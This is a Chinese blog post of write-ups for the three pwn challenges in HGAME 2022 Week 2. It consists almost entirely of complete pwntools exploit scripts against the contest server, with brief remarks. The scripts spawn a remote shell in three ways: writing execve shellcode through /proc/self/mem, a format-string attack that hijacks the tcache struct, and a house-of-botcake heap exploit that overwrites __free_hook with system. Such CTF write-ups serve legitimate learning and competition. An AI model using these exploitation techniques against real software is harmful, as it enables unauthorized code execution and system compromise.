HGAME 2022 Week2 Pwn

简简单单,轻轻松松,真的不想多说啥了

blind

方法很多。
通过mem的写入是无视权限的,直接把text段这些改成shellcode就行。
或者,打一打exit hook这些啊,随便怎么写都能通......

from pwn import *
from hashlib import *
context.arch = 'amd64'
context.log_level = 'debug'

s = remote('chuj.top', 51759)
libc = ELF('./libc-2.27.so')
ld = ELF('./ld-2.27.so')

def getYZM(s64):
	assert len(s64)==64
	table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	s64=s64.decode()
	for i in table:
		for j in table:
			for k in table:
				for l in table:
					st=(i+j+k+l).encode()
					if sha256(st).hexdigest()==s64:
						return st

sh=s.recvuntil(" == ")
s64=s.recvline(keepends = False)
s.sendafter("> ", getYZM(s64))

s.recvuntil("the address of the function write: ")
write_addr = int(s.recv(14), 16)
success("write_addr:\t" + hex(write_addr))
libc.address = write_addr - libc.sym['write']
success("libc_base:\t" + hex(libc.address))

s.sendafter(">> ", b'/proc/self/mem\x00')

s.sendafter(">> ", str(libc.sym['puts']))

shellcode = """
	mov rbx, 0x68732f6e69622f
	push rbx
	push rsp
	pop rdi
	xor esi, esi
	xor edx, edx
	push 0x3b
	pop rax
	syscall
"""
s.sendlineafter(">> ", asm(shellcode))
'''
s.sendafter(">> ", str(libc.address + 0x3e7738))
s.sendlineafter(">> ", p64(libc.address + 0x4f432))
'''
s.interactive()

echo_sever

官方wp格式化字符串硬改,弄得贼麻烦,搞不懂,直接劫持tcache struct就秒了...

from pwn import *
import string
from hashlib import sha256
context(arch = 'amd64', os = 'linux', log_level = 'debug')

#io = process("./echo")
io = remote("chuj.top", 52235)
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc = ELF("./libc-2.31.so")

table = string.digits + string.ascii_letters
io.recvuntil(" == ")
tar = io.recv(64).decode()
success("tar:\t" + tar)
prefix = ""
f = 0
for a in table:
    for b in table:
        for c in table:
            for d in table:
                sha = (a + b + c + d).encode()
                if sha256(sha).hexdigest() == tar:
                    prefix = a + b + c + d
                    f = 1
                    break
            if f == 1 :
                break
        if f == 1 :
            break
    if f == 1 :
        break
success("prefix:\t" + prefix)
io.sendlineafter("> ", prefix.encode())

io.sendlineafter(">> ", str(0x20))
io.sendline(b'%13$p')
io.recv(2)
libc.address = int(io.recv(12), 16) - 243 - libc.sym['__libc_start_main']
success("libc_base:\t" + hex(libc.address))

io.sendlineafter(">> ", str(0x20))
io.sendline(b'%6$p')
io.recv(2)
stack_addr = int(io.recv(12), 16) - 0x10
success("stack_addr:\t" + hex(stack_addr))

io.sendlineafter(">> ", str(0x20))
io.sendline(b'%1$p')
io.recv(2)
heap_base = int(io.recv(12), 16) - 0x2a0
success("heap_base:\t" + hex(heap_base))

io.sendlineafter(">> ", str(0x20))
payload = b'%' + str(stack_addr & 0xffff).encode() + b'c' + b'%6$hn'
io.sendline(payload)

io.sendlineafter(">> ", str(0x20))
payload = b'%' + str((heap_base & 0xffff) + 0x10).encode() + b'c' + b'%10$hn'
io.sendline(payload)

io.sendlineafter(">> ", str(0x280))
payload = p64(0)*2 + p64(1) + p64(0)*21 + p64(libc.sym['__realloc_hook'] - 8)
io.sendline(payload)

io.sendlineafter(">> ", str(0))

io.sendlineafter(">> ", str(0x90))
io.sendline(b'/bin/sh\x00' + p64(libc.sym['system']))

io.sendlineafter(">> ", str(0x233))
io.interactive()

oldfashion_note

一个house of botcake模板题,没啥好说的,官方题解用的fastbin reverse into tcache,也行。

from pwn import *
from hashlib import *
context.arch = 'amd64'
context.log_level = 'debug'

#s = process('./note')
s = remote('chuj.top', 51371)
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF("./libc-2.31.so")

def getYZM(s64):
	assert len(s64)==64
	table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	s64=s64.decode()
	for i in table:
		for j in table:
			for k in table:
				for l in table:
					st=(i+j+k+l).encode()
					if sha256(st).hexdigest()==s64:
						return st

def add(index,size,content):
	s.sendlineafter(b'>> ' , b'1')
	s.sendlineafter(b'>> ' , str(index))
	s.sendlineafter(b'>> ' , str(size))
	s.sendafter(b'>> ' , content)

def show(index):
	s.sendlineafter(b'>> ' , b'2')
	s.sendlineafter(b'>> ' , str(index))

def delete(index):
	s.sendlineafter(b'>> ' , b'3')
	s.sendlineafter(b'>> ' , str(index))

sh=s.recvuntil(b") == ")
s64=s.recvline(keepends=False)
s.sendline(getYZM(s64))

for i in range(7):
	add(i , 0x90 , b'a')
add(7 , 0x90 , b'a')
add(8 , 0x90 , b'a')
add(9 , 0x90 , b'a')


for i in range(7):
	delete(i)

delete(7)
delete(8)

show(7)
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
success(hex(libc_base))
system_addr = libc_base + libc.sym['system']
__free_hook = libc_base + libc.sym['__free_hook']

add(10 , 0x90 , b'a')
delete(8)

payload = b'a'*0x90 + p64(0) + p64(0xa1) + p64(__free_hook)
add(11 , 0xb0 , payload)

add(12 , 0x90 , b'/bin/sh\x00')
add(13 , 0x90 , p64(system_addr))
delete(12)
s.interactive()

相关文章:

猜你喜欢
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode